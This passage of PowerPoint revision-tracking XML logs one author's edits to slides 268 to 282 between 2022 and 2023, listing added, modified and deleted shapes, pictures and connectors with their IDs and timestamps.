        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T14:53:08.411" v="773" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1726629763" sldId="268"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T14:53:08.411" v="773" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1726629763" sldId="268"/>
            <ac:picMk id="3" creationId="{4008DF82-D342-7198-001F-580EC4678612}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T21:53:37.644" v="6382" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="422787289" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:24:51.519" v="2789" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="422787289" sldId="269"/>
            <ac:spMk id="2" creationId="{80F459AA-7938-0110-13F9-B2770C9DD09A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:24:57.171" v="2790" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="422787289" sldId="269"/>
            <ac:spMk id="4" creationId="{A99F7874-DC8A-EC29-DD83-DEF6F774D08C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:25:06.682" v="2800" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="422787289" sldId="269"/>
            <ac:spMk id="6" creationId="{05914F12-2B87-6177-DB05-A1096CEF8FEE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:24:51.519" v="2789" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="422787289" sldId="269"/>
            <ac:picMk id="3" creationId="{1A28677C-FCF8-1CE8-9CE8-384008D3734E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:24:51.519" v="2789" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="422787289" sldId="269"/>
            <ac:picMk id="5" creationId="{90F79FA5-9E3D-1BFB-50C3-83937D9C689C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:45:22.502" v="904" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1739631274" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:43:57.089" v="886" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:spMk id="4" creationId="{74F1E056-3ACC-CBD2-E30E-41E13E226020}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:44:05.350" v="887" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:picMk id="3" creationId="{2D7C6934-3252-18C1-D977-96727CA4513F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:44:39.823" v="895" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:cxnSpMk id="6" creationId="{99250E8B-6E73-7F52-0417-BD1899AA9ED9}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:44:36.921" v="894" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:cxnSpMk id="8" creationId="{F96B11E5-6E38-B640-3C93-0FC9BAA68373}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:44:32.628" v="893" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:cxnSpMk id="10" creationId="{8EDE5C28-D8A7-9B55-2421-B4E9280E5096}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:45:22.502" v="904" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:cxnSpMk id="14" creationId="{5797AAEC-AB6E-018E-6F76-486B82555B87}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:45:14.513" v="902" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:cxnSpMk id="15" creationId="{E63BA847-6E70-BD77-AB03-BFB619F08293}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-02T15:45:18.685" v="903" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1739631274" sldId="270"/>
            <ac:cxnSpMk id="16" creationId="{91317D27-7182-36BC-AB43-398A68287959}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T21:54:38.313" v="6383" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4144120464" sldId="271"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-03T12:19:27.401" v="978" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4144120464" sldId="271"/>
            <ac:picMk id="3" creationId="{30B3CB14-3CC3-1A9F-4A24-AB2BC8302235}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T13:48:26.143" v="2811" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2206684447" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-03T18:42:54.338" v="1024" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2206684447" sldId="272"/>
            <ac:spMk id="2" creationId="{273CCE15-2F58-F4F2-CD30-07433BC6099D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T13:48:26.143" v="2811" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2206684447" sldId="272"/>
            <ac:spMk id="3" creationId="{4C634A31-3E21-C833-950B-24879D8160E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T13:47:53.796" v="2810" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2206684447" sldId="272"/>
            <ac:spMk id="5" creationId="{EF505347-D1ED-18D7-1E68-F334A9E7153E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T13:51:39.660" v="5353" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="320192880" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-03T18:58:29.807" v="1130" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320192880" sldId="273"/>
            <ac:spMk id="2" creationId="{FAF629F4-5401-67FE-E425-043F3EF30F9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T13:51:39.660" v="5353" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320192880" sldId="273"/>
            <ac:spMk id="3" creationId="{E361F6AC-044E-48E0-3BAD-CBD0C8EBC6B0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:18:38.062" v="3097"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1633303434" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:11:44.543" v="3063" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1633303434" sldId="274"/>
            <ac:spMk id="2" creationId="{0DF35394-6AA6-85EC-DE7F-7D546D713D80}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:18:38.062" v="3097"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1633303434" sldId="274"/>
            <ac:spMk id="3" creationId="{C12B4C75-A2C5-9E40-12A8-B46F6FF1F578}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:29:59.203" v="7161" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2050112657" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:29:59.203" v="7161" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2050112657" sldId="275"/>
            <ac:spMk id="2" creationId="{706E8297-06FF-0C89-D539-2533892254E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:16:57.367" v="5075" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2050112657" sldId="275"/>
            <ac:spMk id="3" creationId="{DE7D8D72-35EC-9689-C22D-ED73BB007287}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:13:19.862" v="5565" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2269940235" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T13:57:29.617" v="5482" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269940235" sldId="276"/>
            <ac:spMk id="2" creationId="{B34D3D8F-3CCF-7DA5-3721-23FAF870DDF3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T14:13:19.862" v="5565" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269940235" sldId="276"/>
            <ac:spMk id="3" creationId="{BE3F1F6C-5437-3958-E9C2-B87B156E1826}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T03:39:52.877" v="5315" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269940235" sldId="276"/>
            <ac:picMk id="5" creationId="{BF3CAFDE-11B3-EC32-6F80-BB2EFBB489BC}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T02:18:25.796" v="5076" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="839724941" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:27:00.836" v="3193" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="839724941" sldId="277"/>
            <ac:spMk id="2" creationId="{E57970AD-FBB4-5EDF-6D11-00FC35B9457C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-03T19:57:42.988" v="2306" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="839724941" sldId="277"/>
            <ac:spMk id="3" creationId="{E0F70975-25FB-8167-CEEC-F2EC801E03AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:30:45.037" v="7168" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="180300932" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:30:26.813" v="7163" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180300932" sldId="278"/>
            <ac:spMk id="2" creationId="{0BACD34E-64F3-EE00-12D8-4D3D6A0A7583}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:30:45.037" v="7168" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180300932" sldId="278"/>
            <ac:spMk id="5" creationId="{10AC58FE-B157-2099-0994-809B980D55B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:30:45.037" v="7168" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180300932" sldId="278"/>
            <ac:picMk id="3" creationId="{F82EC796-B583-EEA6-4C98-8EF889926942}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:30:45.037" v="7168" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="180300932" sldId="278"/>
            <ac:cxnSpMk id="9" creationId="{91DC025D-1EF2-61B8-896D-3EB6308BCB40}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:31:22.577" v="7175" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2184058305" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:31:01.315" v="7170" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184058305" sldId="279"/>
            <ac:spMk id="2" creationId="{9C9A5842-44FF-0A32-E27C-EEF5E64616E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:31:22.577" v="7175" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184058305" sldId="279"/>
            <ac:spMk id="4" creationId="{9276C5BD-49BB-1B74-1EE0-B05E228769DA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:14:57.347" v="2620" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184058305" sldId="279"/>
            <ac:picMk id="5" creationId="{5EC182BA-218E-0F95-D25A-693B367CEB80}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:15:02.028" v="2621" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2184058305" sldId="279"/>
            <ac:cxnSpMk id="6" creationId="{F7745348-1AE1-77BF-6DE2-497CEBB384D9}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:31:45.473" v="7181" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3560847519" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:31:38.170" v="7177" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3560847519" sldId="280"/>
            <ac:spMk id="2" creationId="{F88D710A-E62E-18FA-8018-B06285EDB2DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:31:45.473" v="7181" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3560847519" sldId="280"/>
            <ac:spMk id="4" creationId="{5A6F520E-33C8-F3DC-58BB-2D22F27A4901}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:14:25.728" v="2615" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3560847519" sldId="280"/>
            <ac:spMk id="8" creationId="{FE1E9864-3275-E4E0-C59E-299C854ED8D9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:14:44.580" v="2618" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3560847519" sldId="280"/>
            <ac:picMk id="5" creationId="{61C7400C-5A5E-AC4D-2B8D-1583D1D6B5DE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:14:47.790" v="2619" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3560847519" sldId="280"/>
            <ac:cxnSpMk id="6" creationId="{F5FCF8E7-1632-3F0E-1090-EECFB0ECC00D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:26:45.382" v="3178"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2936354025" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-09-06T13:15:21.979" v="2622" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2936354025" sldId="281"/>
            <ac:spMk id="15" creationId="{DFB71C68-4A7F-3E9B-A4C0-F78FEC5476DD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:32:02.484" v="7187" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4272849163" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:31:55.162" v="7183" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4272849163" sldId="282"/>
            <ac:spMk id="2" creationId="{A7AFE867-A5E9-2CA6-2242-E99A9382C7EA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:32:02.484" v="7187" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4272849163" sldId="282"/>
